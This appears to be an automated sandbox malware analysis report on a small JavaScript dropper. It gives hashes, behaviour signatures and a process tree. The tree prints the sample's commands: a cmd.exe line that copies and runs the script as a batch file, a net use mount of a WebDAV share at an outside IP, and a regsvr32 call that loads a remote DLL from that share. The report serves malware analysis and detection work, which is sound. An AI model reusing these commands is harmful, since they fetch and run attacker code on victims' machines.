Analysis
max time kernel: 120s
max time network: 123s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/07/2024, 09:26
Static task: static1
Behavioral task: behavioral1 (sample: 155945859957932489.js, resource: win7-20240708-en)
Behavioral task: behavioral2 (sample: 155945859957932489.js, resource: win10v2004-20240709-en)
General
Target: 155945859957932489.js
Size: 5KB
MD5: 02db4fd1a39cf089e9ed8e1c21a6d26e
SHA1: 49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
SHA256: 522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
SHA512: 9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad
SSDEEP: 96:E5SNRNRZ/viEAwNNq700XA4Nq7008xJBdUjObreVKLVE1T0rQjMDu80+7VGnDuse:QeR1qEpNN600XLN600QGAg76VHdFka
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation
Process: wscript.exe

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious use of WriteProcessMemory (6 IoCs)
description | pid | Process | procid_target
PID 1632 wrote to memory of 4716 | 1632 | wscript.exe | 84
PID 1632 wrote to memory of 4716 | 1632 | wscript.exe | 84
PID 4716 wrote to memory of 2592 | 4716 | cmd.exe | 86
PID 4716 wrote to memory of 2592 | 4716 | cmd.exe | 86
PID 4716 wrote to memory of 3900 | 4716 | cmd.exe | 87
PID 4716 wrote to memory of 3900 | 4716 | cmd.exe | 87
Processes

1. C:\Windows\system32\wscript.exe (PID 1632)
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\155945859957932489.js
   Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe (PID 4716)
      Command line: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\155945859957932489.js" "C:\Users\Admin\\xnsbwi.bat" && "C:\Users\Admin\\xnsbwi.bat"
      Signatures: Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\net.exe (PID 2592)
         Command line: net use \\45.9.74.13@8888\DavWWWRoot\

      3. C:\Windows\system32\regsvr32.exe (PID 3900)
         Command line: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\554.dll
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 5KB
MD5: 02db4fd1a39cf089e9ed8e1c21a6d26e
SHA1: 49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
SHA256: 522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
SHA512: 9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad